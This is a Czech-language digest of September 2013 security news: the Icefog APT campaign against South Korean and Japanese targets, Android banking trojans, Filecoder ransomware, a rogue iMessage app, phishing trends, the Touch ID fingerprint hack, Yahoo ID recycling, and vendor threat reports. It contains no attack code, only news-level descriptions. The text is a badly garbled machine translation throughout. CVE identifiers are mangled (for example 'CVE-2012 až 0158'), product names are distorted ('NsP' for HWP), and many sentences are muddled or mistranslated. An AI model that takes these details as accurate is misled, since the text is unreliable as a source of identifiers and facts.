Kdo je za to zodpovědný? Uveďte informace o Icefog je k dispozici prostřednictvím naší soukromé zprávě dostupné pro partnery vlády a vymáhání práva.
Kromě Japonska a Jižní Koreje, jsou tam oběti v jakékoli jiné zeměpisné poloze? Ano, jsme pozorovali mnoho obětí v několika dalších zemích, včetně Tchaj-wanu, Hongkongu, Číně, USA, Austrálii, Kanadě, Velké Británii, Itálii, Německu, Rakousku, Singapuru, Běloruska a Malajsie. Domníváme se však, že tento seznam zemí nemusí představovat skutečný zájem z útočníků. Některé vzorky byly distribuovány prostřednictvím veřejně přístupných internetových stránkách a mohou zasáhnout náhodné oběti z jakékoliv země na světě. Věříme, že to bylo děláno, aby sonda malware v různých prostředích a vyzkoušet jeho účinnost.
Na jak dlouho, že útočníci byli aktivní? Icefog působí nejméně od roku 2011, se zaměřením hlavně Jižní Koreje a Japonska. Známé cílům patří vládní instituce, vojenští dodavatelé, námořní / lodní stavitelství skupiny, telekomunikační operátoři, průmyslové a vysoce technologických firem a médií.
Věděli útočníci použít některé zajímavé / pokročilých technologií? Příkaz-a-ovládací prvky jsou neobvyklé v jejich rozsáhlé využití technologií AJAX, což je graficky lákavé a snadné použití. K útoku obětí, Icefog útočníci běžně používá NsP dokumenty, které jsou neobvyklé a vzácná forma útoku, částečně proto, že se výrobek HWP používá téměř výhradně v Koreji.
Jednou jedna z obětí, jsme pozorovali, co se zdá být použití Kernel exploit prostřednictvím Java aplikace pro eskalaci oprávnění, i když nevím, jestli to byl zero-day, nebo ne, jak byl soubor není k dispozici .
Má Kaspersky Lab detekovat všechny varianty tohoto malware? Ano, naše produkty detekovat a odstranit všechny varianty malwaru použité v této kampani:
Existují Ukazatele kompromis (IOCs), jak pomáhat obětem identifikovat vniknutí?
Icefog APT: Příběh plášť a tři dýky 26.9.2013 Zdroj: Kaspersky Hacking | Počítačový útok
Vznik malých skupin kybernetické žoldáků k dispozici k pronájmu provádět chirurgické operace hit a běh. Svět pokročilých perzistentních hrozeb (apts) je dobře známá. Kvalifikovaní protivníci kompromisů vysoce postavených oběti a nepozorovaně exfiltrating cenná data v průběhu mnoha let. Tyto týmy někdy počítat desítky nebo dokonce stovky lidí, prochází TB nebo dokonce petabajty exfiltrated dat.
Ačkoli tam byl rostoucí zájem o přičítání a přesné zdroje těchto útoků, ne hodně je známý o nově vznikající trend: menší hit-and-run gangy, které se chystáte po dodavatelském řetězci a ohrožení cílů s chirurgickou přesností.
Od roku 2011 jsme sledovali sérii útoků, které jsme odkaz ohrožení herce s názvem "Icefog". Věříme, že je relativně malá skupina útočníky, kteří se jdou po v dodavatelském řetězci - zaměřit vládní instituce, vojenští dodavatelé, námořní a stavba lodí skupiny, telekomunikační operátoři, satelitní operátoři, průmyslové a špičkové technologie a sdělovací prostředky, zejména v Jižní Korea a Japonsko. To Icefog kampaně spoléhají na zakázku Cyber-špionáže nástrojů pro Microsoft Windows a Apple Mac OS X. útočníků přímo ovládat infikované stroje během útoků, kromě Icefog, všimli jsme si je pomocí jiné škodlivé nástrojů a zadní vrátka pro boční pohyb a Údaje exfiltrace.
Klíčové poznatky o Icefog útoky:
Útočníci se spoléhají na kopí-phishing a využívá k známých zranitelností (např. CVE-2012 až 0158, CVE-2012-1856 CVE-2013 až 0422 a CVE-2012-1723). Návnada dokumenty použité při útocích jsou specifické pro cílový zájem, například útok na mediální společnost v Japonsku používá následující návnadu:
Lure dokument zobrazený na oběti po úspěšném provedení exploitu
Na základě profilů známých cílů, útočníci Zdá se, že zájem těchto oblastech: vojenské, stavby lodí a námořní operace, výzkumné společnosti, telekomunikační operátory, satelitní operátoři, média a televize . Výzkum ukazuje, že útočníci měli zájem o cílení dodavatelů obranného průmyslu jako Lig Nex1 a Selectron průmyslová společnost , lodní společnosti jako DSME Tech, Hanjin Heavy Industries nebo telekomunikační operátoři, jako je Korea Telecom . Útočníci jsou únosy citlivých dokumentů a plánuje společnost, e-mailových účtů pověření a hesel pro přístup k různým zdrojů uvnitř i vně oběti síti. Během operace, útočníci se pomocí "Icefog" backdoor sadu (také známý jako "Fucobha"). Kaspersky Lab identifikovány verze Icefog jak pro Microsoft Windows a Mac OS X . Zatímco ve většině ostatních APT kampaní, oběti zůstává infikovaný po celé měsíce nebo dokonce roky a útočníků jsou průběžně exfiltrating dat Icefog operátoři zpracování oběti rychle a chirurgické způsobem - vyhledávání a kopírování pouze konkrétní a cílené informace. Jakmile je požadovaná informace je získána, ale opustit infekce a jít dál. Ve většině případů se Icefog operátoři zřejmě již velmi dobře vědí, co je třeba z obětí. Vypadají konkrétní názvy souborů , které jsou označeny a převedeny do C & C. Kaspersky Lab by rád poděkoval KISA (Korea Internet & Security Agency) a Interpolem za jejich podporu v tomto šetření.
Krátký přehled Android malware bankovního 25.09.2013 Mobil | Viry Jak více a více lidí používá své mobilní telefony ke své online bankovnictví, převody peněz, a tak dále, počítačoví podvodníci třímající bankovní malware, se stále více obracejí k cílení mobilních uživatelů. "Bankovní trojské koně pro mobilní telefony byly velmi úspěšné zacílení starších systémů generace operačního jako J2ME a Blackberry, ale nebyly provedeny pokrok, že bych asi chtěl na Android a iOS, "říká Malwarebytes 'Armando Orozco.
Ve skutečnosti, pokud ví, že žádné bankovní trojské koně pro platformu iOS byl objeven, s největší pravděpodobností proto, že je velmi obtížné propašovat malware do obchodu Apple App Store. Zatímco Android malware stále převážně soustředí na podvodu SMS, bankovní trojské koně jsou není zcela znám. "ZitMo, SpitMo a CitMo jsou mobilní bratranci Zeus, SpyEye a Citadela, tři nechvalně bankovní trojské koně, které ovlivňují systém Windows," říká Orozco. "Ti všichni udělal dojem na Android a měli nějaký úspěch." Fungují zachytí textové zprávy, které obsahují mTANs (mobilní čísla transakce ověření) - další způsob, jak zajistit bezpečnost on-line uživatelů bankovních operací - a odesílání je na vzdálené servery pro útočníci použít k zosobnění obětí a vypusťte své účty. Zitmo bylo známo, že vydávat se jako bezpečnostní řešení pro Android, a funguje ve spojení se systémem Windows Trojan, který je schopen vstřikování další : Během bankovní uživatelů zasedání, žádají oběti podělit se o své telefonní číslo a model. SpitMo a CitMo práce ve velmi podobným způsobem. Hesperbot je mobilní verze je velmi Posledním přírůstkem do skupiny. Šíří se přes phishingových e-mailů, a to je zajímavé poznamenat, snaží se infikovat Android zařízení, ale i těch, kteří vedou Symbian a BlackBerry. PC malware keylogging schopnosti, může vzít screenshoty a unášet telefonu fotoaparát k zachycení videa, nastavit vzdálených proxy, atd., a zachycuje oběti telefonní číslo, aby mohla dodávat mobilní Trojan složku přes odkaz v SMS. Jakmile je mobilní verze je nainstalována, funguje to stejně jako Zitmo a ostatní: zachytí textové zprávy účetní autentizační kódy. Perkel je další finanční malware cílení Android uživatelům. PC verze se chová jako malware Hesperbot je, s tím rozdílem, že vyzve uživatele k instalaci certifikátu zabezpečení a požádat o jejich telefonní číslo předem. Mobilní složka, podobně, dodáno prostřednictvím SMS. zajímavá věc, že výzkumníci zjistili, že digitální certifikát varianta Perkel malware byl podepsán, aby to vypadalo, že aplikace byla vytvořena legitimní podnikových bezpečnostních USA. "Toto také poukazuje na to, jak otevřít hřiště Android je, že někdo může podepsat jejich aplikace jakýmkoliv způsobem a nedochází k ověření, "říká Orozco. "Nezapomeňte opatrní při používání mobilních bankovních aplikací a snaží se vyhnout přístupu k vašemu bankovní účty přes nejistý a / nebo veřejné sítě, "řekl nakonec varuje. "Pokud si nejste jisti, že aplikace je z vaší banky, to nikdy neuškodí zkontrolovat s nimi před instalací.
Rootkit detektor pro OS X 25.09.2013 Rootkit ESET Rootkit Detector je nový bezpečnostní nástroj pro OS X, který skenuje škodlivých jádra rozšíření, které se snaží změnit chování operačního systému hákování uvnitř operačního systému. Když nepoctiví jádro rozšíření háček uvnitř OS X, mohou obcházení bezpečnostních opatření a tím umožňuje úplný přístup systémovými právy.
"ESET Rootkit Detector je jednoduchý a efektivní nástroj pro detekci rootkitů na platformách OS X. Pomocí tohoto nástroje se snažíme pomoci uživatelům rozpoznat změny v OS X paměti jádra, které by mohly signalizovat přítomnost rootkit v systému, "říká Pierre-Marc Bureau, ESET Security Intelligence Program Manager. průběhu loňského roku, ESET má pozorováno více rootkity zaměřené na OS X. S rootkit kódy k dispozici on-line, které byly ohroženy systémy bez vědomí majitele. Rootkity jako OSX / Morcut a OSX / krizové byly použity k špehovat a krást informace z nic netušících uživatelů. ESET Rootkit detektor nabízí intuitivní a uživatelsky přívětivé způsob, jak kontrolovat integritu jádra a poskytnout informace o možných problémech. To podporuje Snow Leopard (10.6.0) až po nejnovější verzi Mountain Lion 10.8.4 (v současné době). Kromě toho, že pracuje na Intel 32-bit a 64-bitové jádro.
Velký nárůst malwaru Filecoder 25.09.2013 Viry ESET HQ malware výzkumná laboratoř hlásí neobvyklý hrot v actvity malware Filecoder -. Trojských koní, které šifrování uživatelských souborů a pokusit se vydírat výkupné od oběti výměnou za dešifrování software ESET LiveGrid - společnosti cloud-based malware systém sběru - ukázal rostoucí týdenní počet odhalených Win32/Filecoder o více než 200%, od července 2013 z průměrného počtu v období leden - června 2013. Nejvýznamnější podíl na odhalení (44%) jsou z Ruska, ale významný podíl je vykazován v jižní Evropě (Itálie, Španělsko), střední a východní Evropy (Německo, Česká republika, Polsko, Rumunsko a Ukrajina) a Spojené státy . infikovat počítač, zločinci používají různé metody infiltrace:. drive-by download z malware laděných webových stránek, e-mailů, instalace prostřednictvím jiné Trojan nebo backdoor, nebo dokonce ruční instalaci útočníka "Win32/Filecoder malware rodina je mnohem nebezpečnější než jiné druhy tzv. ransomware jako obvykle šifrovat fotografie, dokumenty, hudbu a archivy. Široká škála technik a úrovní kultivovanosti byl viděn v různých variantách v průběhu času, "říká Robert Lipovský, ESET Malware výzkumník. "To může být velmi drahé. Vzorků malwaru v této kategorii obvykle požadují částky kolem € 100 - € 200, ale některé z nich byly vidět vydírat až do výše € 3000. Velké množství je v souladu s tím, že útočníci většinou se zaměřují podniky, které mohou obvykle dovolit platit vyšší výkupného než jednotlivci, "dodává. Jedna nedávná varianta klade obětí pod tlakem tím, že zobrazuje odpočítávání o tom, že šifrovací klíč bude trvale odstraněn a obnovu šifrovaných souborů téměř nemožné. ESET doporučuje, aby uživatelé internetu jsou chráněny pravidelně aktualizované anti-virus software. Nicméně, to je také dobrý nápad chránit heslem anti-malware software je nastavení zabránit jim být změněn útočníkem a zálohování pravidelně.
Neoficiální Android aplikace iMessage mohou krást informace a stáhnout malware 25.09.2013 Viry | Mobil Android uživatelé, kteří snili o tom být schopný používat iMessage, Apple proprietární a bez řešení pro zasílání zpráv, které byly příjemně překvapeni IMessage konverzaci pro Android nabízeno ke stažení na Google Play.
Funguje to tak, jak výrobce, a představuje jako Mac mini, když se připojí k serveru Apple IMessage. Ale podle 9to5Mac , výzkumníci a vývojáři softwaru varují před jeho použitím. Za prvé, to nebyla vytvořena společností Apple, ale vývojáře třetí strany jménem Daniel Zweigart, který může nebo nemusí mít škodlivé úmysly. Za druhé, jsou zprávy uživatelům odesílat a přijímat pomocí této aplikace nejprve zpracován serverem prostřednictvím se nachází v Číně, pak předány serveru společnosti Apple. Za třetí, použít aplikaci mají buď zpívat se svou Apple ID nebo vytvořit nový Apple účet a přihlaste se - to znamená, že tyto přihlašovací jméno a heslo bude předána - a to by mohlo být skladovány a zneužil -. podle Zwigert V neposlední řadě, app prý má schopnost stáhnout další APK kódu bez vědomí uživatele - to znamená, že by si také stáhnout malware. Na tomto místě by mě zajímalo, jak to, že Google ještě zjišťuje a odstraňuje potenciálně škodlivé aplikace z jejich úředním obchodě Android Market. Ale i když se tak stane, bude třetí-party on-line aplikací pro systém Android trhy pravděpodobně vítají. Uživatelům se doporučuje, aby se zabránilo použití aplikace až do další podrobnosti o něm jsou známy a vražda je vyloučeno. UPDATE: Google odstranil aplikace z Google Play .
Phishing a nebezpečné přílohy z přírůstku 25.09.2013 Phishing Spam objem klesl v srpnu, ale s úrovní phishingu zvýšit desetinásobně a nebezpečné přílohy byly zjištěny v 3,4 procenta více e-mailů, ve srovnání s červencem, spam zjevně stal mnohem nebezpečnější, tvrdí Kaspersky Lab.
Některá témata v srpnu běží spam byly předvídatelné ("Zpátky do školy" a Svátek práce), jiní byli ti, aktuální po celý rok (zdravotní a sportovní spam, prodeje automobilů). Čína stále vede žebříček světových zdrojů spamu (21 procent z všech spam), s USA (19 procent) a Jižní Korea (15,4 procent), na druhém a třetím místě. To je zajímavé poznamenat, že nejrozšířenější malware dodáno prostřednictvím příloh je Trojan-Spy.html.Fraud.gen , kus malware, který " se objeví ve formě HTML stránek, které napodobují registračních formulářů známých bank nebo e-mzdové systémy a jsou používány phisherů ukrást přihlašovací údaje pro on-line bankovních systémů. " top ten seznam (očekávaně) obsahuje čtyři různé varianty patří Ransomware do stejné skupiny ( Blocker ). Fungují tak, že blokuje počítač obětí a požádal je, aby zaplatit peníze odemknou. Tři červy - jeden funguje jako malware downloader, jeden jako přesměrovač podvodné stránky, a třetí je e-mail mlátička a backdoor - mají také seznam, stejně jako varianta Trojan Zeus bankovnictví. "prázdnin může být postupně slábne, ale podvodníci udržovali nepřetržité bombardování falešných zpráv oznamujících neexistující letecké společnosti a hotelové rezervace s spammery pomocí některé největší jména v těchto odvětvích, "výzkumníci sdílena. Falešné oznámení údajně pocházející z populárních mezinárodních doručovacích služeb, jako jsou stále dodávají malware. "August viděl pokles v obchodní činnosti, aby spammeři dostal méně zakázek pro reklamu a nadšeně přešel na podvodné zprávy," Poukázal rovněž na to. "V důsledku toho se podíl phishingových e-mailů ve světové spam provozu zvýšil desetinásobně ve srovnání s červencem, dosáhl 0,013%." Informace o phishingu byly po byly sociálních sítí pověření účtu (téměř 30 procent), e-mail a IM přihlašovacích údajů (o 17 procent ), vyhledávače (16 procent), následují finanční a e-pay služeb, IT dodavatelé, telefon a ISP, atd. byly Apple zákazníci silně zaměřena v srpnu, se falešné e-maily zdánlivě pocházející z "Apple Security", nutit uživatele, aby " potvrzení "informace o jejich účtu do 48 hodin. Bohužel ti, kteří padli na to měli Apple ID a heslo ke svému účtu rozluštěno. "Během léta, spam se stává trestným činem a počet falešných zpráv, které obsahují škodlivé soubory zvyšuje," výzkumníci vysvětlili výsledky, křídování značný pokles celkový počet nevyžádaných e-mailů do meziročního poklesu v obchodní činnosti v průběhu letního období. "Nicméně, v září, kdy obchodní činnost začne obnovovat tento zájem přejde od sociálních sítí zpět do finančních institucí, a počet útoků na bankovní sektor bude zvýšit. Zároveň budou podíly podvodným a škodlivým zásilek s největší pravděpodobností pokles, "oni uzavřena
Java využije skok, Android malware se objeví mimo app obchodech 25.09.2013 Viry | Zranitelnosti | Hacking Pokračující vzestup využívání útoků na, a to zejména proti Javě, a rostoucí sofistikovanost v mobilních hrozeb charakterizoval první polovině roku 2013, který viděl jeho podíl na zajímavých vývoj ve světě digitální bezpečnosti. Podle nové F-Secure je Threat Report , téměř 60% z top F-Secure deset zjištěných v prvním pololetí roku 2013 byly hrdinské činy. vysoké procento zjištěných činů je dobrá věc, podle Sean Sullivan, bezpečnostní poradce ve společnosti F-Secure Labs. "Skutečnost, že většina našich deset nejlepších detekcí blokují využije spíše než s užitečným zatížením - to znamená, že děláme dobrou práci, ujistěte se, že malware sám o sobě nemá ani šanci vstoupit do stroje," říká . Uživatelé v USA viděl největší chybu související útoky s 78 z každých 1000 uživatelů potýká exploit pokus. Německo a Belgie následovala 60 ze 1000 potýká exploit pokusy. Java cílené využije vést smečku využije jako celku, což tvoří téměř polovinu z deseti největších odhalení, a to až z třetiny předchozí pololetí. Využije jsou programy, ale jsou to prostě jen další prostředek pro získání škodlivého kódu do stroje, jako infikované jednotky USB nebo e-mailem. Obvykle útočí přes škodlivé nebo narušení webových stránek, které využívají chyb v kódu na počítači je nainstalované aplikace pro přístup do počítače a infikovat ji s malware, který může špehovat na uživatele, ukrást hesla nebo jiná citlivá data, nebo povolit zločinci převzít kontrolu ze stroje. bylo 358 nových rodin a varianty malwaru Android objeven Labs F-Secure v 1. pololetí téměř zdvojnásobil celkový počet Labs kdy objevil na 793. (Počet vzorků Android nacházejí v 1. pololetí bylo 405.140, včetně spyware a adware, malware vzorky samostatně číslovány 257443). Symbian následoval s 16 nových rodin a variant. Žádné nové rodiny nebo varianty byly objeveny další mobilní platformy. Android malware není jen distribuována app obchodech už, a to buď. V první polovině roku 2013 došlo rozvoz malvertising a automatickým stahováním z webu při návštěvě ohrožena stránky. Malvertising nebo reklamy, které vedou uživatele na nebezpečné výrobky, se stále více používá k distribuci mobilního malware, náležitý z části k jeho širokému dosahu. Zatímco ještě méně sofistikované na mobil, než na PC, jsou drive-by download bude pokračovat jako útoku. Mobile Drive-bys použít potvrzující zprávu s dotazem, zda chce uživatel nainstalovat aplikaci, což je více než zřejmé, PC drive-odstavných ploch, s možností obcházet. Stels, trojské Android, které slouží více účelům, od budování botnety krást Čísla mobilních transakcí Authentication (mTANs) jako bankovní trojan, používá metody, které jsou obvykle charakteristické pro Windows malware, jako je spam jako metody distribuce. To slouží jako důkaz, že Android malware se postupující blíže k dosažení vysoce rozvinutou úroveň hrozby Windows.
Yahoo ID recyklační schéma je potenciální bezpečnostní minové pole 25. září 2013. Zabezpečení Yahoo nedávno oznámila, e-mailový účet / Yahoo ID recyklační schéma mělo uvolnit neaktivní (atraktivní), účty tak, aby mohly být obsazena jiným uživatelem. Ale zatímco nápad byl zpočátku myšlenka vedení firmy jako dobrý tah, realita se ukázala být tvrdší.
InformationWeek s Kristin Burnham byl vystopoval tři uživatelé, kteří využili (pak zdarma, nyní stojí 1,99 dolarů) nabízí vytvoření seznamu přání svých pěti nejlepších možností pro uživatelské jméno, a mají to štěstí, že na získání jednoho. Ale to, co Nečekal byl příval legitimní a spam e-maily, které nadále přijímat ve své nové e-mailové schránky. Marketing e-maily, Facebook a Pandora e-maily s informacemi o účtu určitou, e-maily od investičních podniků a Boost Mobile, e-mailem potvrzení o převzetí od obchodů, detailní najeto proplacení, Soud informace, a ještě mnohem více bylo dodáno, často včetně osobní a finanční údaje jsou noví uživatelé mohli snadno použít ukrást identitu předchozího majitele účtu. Teoreticky by to nestalo. Když Yahoo udělal seznam neaktivních účtů ( po oznámení jejich majitelé iniciativy a tím, že obdrží doklad, že účty byly stále používají), vymažou se všechna data obsažená na účet. Pak vzali měsíc posílat zacvakávací e-mailem upozornění odesílatele, že deaktivován účet již existuje; odhlásit těchto účtů z komerčních e-mailů, jako jsou bulletiny a e-mailových upozornění a koordinovat s on-line služeb a firem provádění "Vyžadovat-příjemce-Platí-Since" (RRVS) hlavička, která by zabránila e-maily resetování hesla, které mají být dodány do nového vlastníků. Ale v praxi se tato opatření selhala. Yahoo řekl, že "slyšel z velmi malého počtu uživatelů, kteří obdrželi e-maily prostřednictvím jiných třetích stran, které byly určeny pro předchozí majitele účtu" a že pokračovat v práci s firmami realizovat RRVS záhlaví e-mailu. Nicméně rozhovor Tři noví majitelé nebyli nakonec spokojeni s přechodem na nový účet, a to buď snaží filtrovat nevyžádané e-maily, uzavřeli nový účet a vrátila se ke staré, nebo se aktivně přemýšlet o tom, jak to udělat. Všichni ve všech, co by mělo být pozitivní zkušenost, která by z nich udělala ocení Yahoo ještě se stala nepříjemnost a další práce -. není něco, co Yahoo doufal, jistě , ale zda tyto zkušenosti jsou výjimky nebo norma je těžké říct, právě teď - Doufejme, že to první. V těchto případech nový účet majitelé byli etické, a nebyly zneužity citlivé informace, které sbíral prostřednictvím e-mailů, ale šance, že tam jsou lidé, kteří tam nebudou, že ctnostný
Apple dotykový ID hack bylo snazší, než se očekávalo 25.září 2013 Zabezpečení | Hacking Bylo potvrzeno : Kosmik z německého klubu Chaos Computer získal dav-source cenu pro dotykové hacking Apple ID . funkce bezpečnostního Jak vysvětlil Ars Technica , hack bylo snazší, než čekal - místo týden nebo dva doufal by se ho na to, že mu trvalo 30 hodin, a on říká, že s lepší přípravou by trvalo přibližně půl hodiny. "Ty v podstatě to udělat doma s levnou kancelářských zařízení jako skener, laserovou tiskárnou a Sada pro leptání plošných spojů. A to bude trvat jen na pár hodin, "sdílel. "Tyto techniky jsou vlastně několik let a jsou snadno dostupné na internetu." Přesto se domnívá, dotykové ID, že je velmi spolehlivý otisků prstů, ale říká, že Apple by nabízel své pohodlí, a to tvrdil, že je v bezpečí. Lookout Security výzkumník Marc Rogers se snažil kopírovat Kosmiku hack, a podařilo se mu to s některými změnami, aby bylo jednodušší. "Ano, TouchID obsahuje chyby, a ano, je to možné využívat ty chyby a odemknout iPhone. ale skutečnost je taková, Tyto nedostatky nejsou něco, že průměrný spotřebitel by měl bát. Proč? Protože jejich využívání bylo něco ale triviální. Hacking TouchID spoléhá na kombinaci dovedností, stávající akademický výzkum a trpělivost technik Crime Scene, "napsal a sdílet jeho vlastní pohled na hack. "TouchID není" silné "bezpečnostní kontrolou. Jedná se o" výhodné "bezpečnostní kontrolou," říká a ukazuje na to, že to bude chránit vaše data před zloději ulice, která chytne svůj telefon, nebo v případě, ztratíte telefon, ale ne z cíleného útoku. "vyhrazená útočníkovi času a zdrojů pozorovat svou oběť a shromažďování dat, se pravděpodobně nebude vidět TouchID jako velkou výzvu. Naštěstí to není hrozba, že mnoho z nás čelí, "dodal. Ale když se dostal nejvíce pozornosti, Touch ID není jedinou bezpečnostní funkci, aby byly předvedeny Apple při uvolňování nových iPhone a iOS7 - podívejte se na reakce z bezpečnostní komunity na iOS 7 na dozvědět více o nich.
Craigslist SMS Spam podvod s Twist 25.září 2013 Spam | Mobil Symantec Security Response ObrázekSymantec Security Response SPOLEČNOSTI SYMANTEC
Zatímco Craigslist byla vždy oblíbenou sociální inženýrství téma pro podvodníky, společnost Symantec identifikovala další probíhající SMS spam kampaň zneužívá Craigslist popularitu. Podvod triky uživatelé do instalace zdarma a legitimní open source software na PC s využitím telefonních čísel zveřejněné reklamy na Craigslist. Tento software je dodáván s další software, který umožní podvodníci, jak vydělat peníze přes affiliate programy.
Obrázek . Jak SMS spam přesměruje uživatele ke stažení open source software
První etapa zahrnuje podvod oběť přijímací textovou zprávu SMS na svém zařízení. Online průzkum naznačuje, že podvodníci sklizeň telefonní čísla přímo z on-line Craigslist účtování pro tento podvod kampaň. Prodej spam a získávání nástrojů, které automatizují sklizeň telefonní čísla, je běžné o podzemních fórech.
Když uživatel takto na odkaz uvedený v SMS zaslané na ně jsou informováni: "Zařízení není kompatibilní Prosím, podívejte se ze stolního nebo přenosného počítače.". Pokud pak uživatel přejde na odkaz z jejich PC, jsou informováni, že je třeba nainstalovat diváka GIMP legitimní open source software). Při pokusu o instalaci Gimpu nebere uživatele na oficiálních stránkách GIMP , ale na jiné webové stránky, které nabízejí instalaci Gimpu, s možností instalace několika dalších kousků softwaru. Je-li další software je nainstalován, podvodníci vydělat peníze z affiliate provize.
V tomto podvodu uživatelé jsou podvedeni do instalací nežádoucího softwaru do svého počítače a affiliate programy jsou zneužívány podvodníky. Podvodníci mohou také snadno přejít taktiky a trik oběti na instalaci malware na svých počítačích.
Aby se zabránilo, že obětí této a dalších podvodů, buďte obezřetní při přijímání nevyžádané SMS zprávy a vyhnout se stažením a instalací jakéhokoli typu softwaru, pokud pochází z oficiální a seriózní stránky. Symantec také doporučuje uživatelům všude nainstalovat mobilní bezpečnostní aplikace a desktop antivirovou ochranu, jako je například Norton Mobile Security a Norton AntiVirus.
Vystavení slabá místa zabezpečení máme tendenci přehlížet 24. září Zranitelnosti | Zabezpečení
Jako bezpečnostní analytik se často ptají na otázku: "Jaká nebezpečí a zranitelnosti si myslíte, že nám umožňují vidět do budoucnosti?" To je velmi zajímavá otázka, ale také známkou toho, že způsob, jak přemýšlet a diskutovat o IT-bezpečnost je v podstatě špatně. Opravdu potřebujeme investovat čas a prostředky soustředit se na budoucím hrozbám, když jsme ještě před útoky, které byly diskutovány již více než 20 let?
Pokud jste se podívat na některé z hlavních porušení jsme viděli v minulosti, útočníci nepoužili Zero Day zranitelná. Také pokud se podíváte do exploit kity, jsou jen velmi málo skutečně vybavena využije využívají Zero Day zranitelnosti. Aby bylo možné analyzovat to do hloubky, Kaspersky výzkumník David Jacoby spojila své síly s ČSÚ Outpost24 Martin Jartelius, získat přístup k unikátním statistik souvisejících s technickými rizikových expozic od dodavatele správu slabých míst a provedli několik bezpečnostních auditů, který zahrnoval jak sociálního inženýrství, testy a penetrační testy. Nicméně, to bylo vše provedeno bez využití jakékoliv chyby.
Začali jsme analyzovat statistické údaje, které jsme získali, a to netrvalo moc dlouho, dokud naše teorie se ukázala jako správná. Podívali jsme se na frekvenci, starých chyb, což znamená, jaké chyby vlastně jsme zranitelní proti. Rozhodli jsme se zařadit statistiky pro Švédsko a Beneluxu v této zprávě.
Dokonce i statistiky ukazují, že jsme docela dobře chránit se proti zranitelnosti, které jsou nové, ale kupodivu máme tendenci zapomenout na starší zranitelnosti. Některé systémy jsou stále zranitelné zranitelnosti starších než 10 let.
Další zajímavou otázkou je: "jaké systémy máme skutečně snaží zajistit?" Je to velmi žhavé téma hovořit o kritické infrastruktury, ale to, co jiný druh "veřejných zdrojů" tam venku, které by mohly být rozhodující? Co například hotely? Nebo nemocnice? Nebo radiostanice například?
Při výzkumu je vždy důležité, aby se skutečná fakta, a jeden ze způsobů, jak to udělat, je dostat své špinavé ruce. V našem výzkumu jsme chtěli provést praktickou výzvu několik firem z různých odvětví. Hlavní myšlenkou bylo jít ven a navštívit společnosti a provést bezpečnostní audit s předem definovanou seznamu na základě výsledků z výzkumu. Naším cílem bylo ověřit a zjistit, jestli mají nějaké systémy citlivé na staré hrozby a rovněž přezkoumat jejich bezpečnostní rutiny a mnoho dalších testů. Nicméně, jen hrstka firem vlastně chtěl k účasti na této výzvě. Oba si myslíme, že je to naprosto dnes jedním z klíčových problémů, trávíme raději více času na nové vzrušující zranitelností a hrozeb, než ve skutečnosti, že péči o skutečných problémech. Rozhodli jsme se provést úkol stejně, a výsledky byly docela zajímavé.
Útočníci brousit dovednosti: Co to vlastně znamená pro CISO 24. září 2013. Zabezpečení | Hacking Dnes, IBM odhaluje výsledky svého X-Force 2013 Mid-Year Trend a zprávy o rizicích, která ukazuje, že vrchní úředníci bezpečnosti informací (CISO) musí zvýšit své znalosti o vyvíjející se zranitelnost a útoku krajiny, jako jsou mobilní a sociální technologie, účinněji bojovat proti vznikající bezpečnostní hrozby. Pro CISO, je to žádným překvapením, že se snažil a pravdivé taktiky útok může způsobit největší škody podniku. Známé chyby opustil unpatched ve webových aplikacích a serverů a koncových bodů software, vytvářet příležitosti k útokům dochází. Tyto unpatched aplikací a softwaru nadále pomocníky porušuje rok co rok. Nicméně nejnovější X-Force Zpráva rovněž uznává, že útočníci se zlepšit jejich dovednosti, které jim umožní zvýšit návratnost jejich vykořisťování. Tyto útočníci se vydělávat na důvěře uživatelů, pokud jde o nové vektorů, jako jsou sociální média, mobilní technologie a napajedla útoky. Nárůst využívání důvěryhodných vztahů v polovině roku 2013, útočníci nadále zaměřovat na využívání důvěryhodné vztahy se sociálními sítěmi z profesionálně vypadající spamu, posílání škodlivé odkazy, které se zdají být od přátel nebo lidí, které "budou následovat." Tyto útoky dělat práci, poskytuje vstupní bod do organizace. Na jejich obranu, sociální sítě přijaly více proaktivní opatření v pre-skenování odkazy obsažené ve veřejných a soukromých příspěvků / messages. Podvodníci se prodávají účty na sociálních sítích, některé patří ke skutečným lidem, jejichž pověřovací listiny byly ohroženy, jiní vyrobeny a navrženy tak, aby se důvěryhodné prostřednictvím realistických profily a webové připojení. Jako minimum fungují nafouknout stránce "líbí se mi" nebo vyvrátit názory, ačkoli více zákeřné použití patří skrývání vlastní identity provádět trestné činnosti - online ekvivalent falešné ID, ale s svědeckých přáteli, přidávat k podvodu. IBM X-Force očekává, že aplikace sociálního inženýrství propracovanější jako útočníci vytvářet složité Internetworks identit při rafinaci umění klamání obětí. Technologie vylepšení a ovládací prvky jsou k dispozici, osvědčené postupy i nadále rafinované a učil, ale nakonec důvěra uživatel věří, že se mohou obejít cokoliv bezpečnostní odborníci zavést. Otrava napajedlo otravy WaterholeAttackers se zaměřením na centrální, strategické cíle, jako je zvláštního zájmu Webové stránky, které jsou často navštěvují vybranou skupinu potenciálních cílů je efektivní a optimalizovaný způsob využití. Tyto ústřední cíle nemusejí mít vždy silné bezpečnostní řešení a nasadit politiky, a to iv případě, že ano, náklady na přijít na to, jak se dostat přes ně stojí možnost ohrozit jeho uživatelská základna. Tyto "zavlažování díra" útoky jsou skvělé příklad toho, jak funkční sofistikovanost se používá k dosažení cíle dříve citlivý. Tím by byla ohrožena centrální místo a používat to, aby sloužit malware, útočníci jsou schopni dosáhnout více technicky zdatné oběti, které nemohou být oklamáni v pokusy o phishing, ale nebude tušit, že stránky, které by mohly být škodlivé důvěra. rozptýlení a přesměrování techniky Distributed Denial-- of-Service ( DDoS ) útoky lze použít jako rozptýlení, což umožňuje útočníkům prolomit další systémy v podniku, zatímco IT pracovníci jsou nuceni činit obtížná rozhodnutí založené na rizicích, případně bez viditelnosti v plném rozsahu toho, co se děje. Útočníci prokázaly zvýšenou technickou náročnost v oblasti DDoS využitím metod zvyšování množství schopného šířku pásma, aktualizované a účinný způsob, jak zastavit podnikání přerušení on-line služby, stejně jako nové techniky DDoS zmírnění úniků. Vzhledem k tomu, rozsahu a četnosti narušení dat pokračuje ve vzestupné trajektorii, je důležitější než kdy jindy se dostat zpět do základní bezpečnostní základy. Zatímco technická zmírnění je nutnost, vzdělávání uživatelů v celém podniku, že bezpečnost je způsob myšlení, není výjimkou, může jít dlouhou cestu směrem k snížení těchto incidentů. Kompletní zpráva je k dispozici zde .
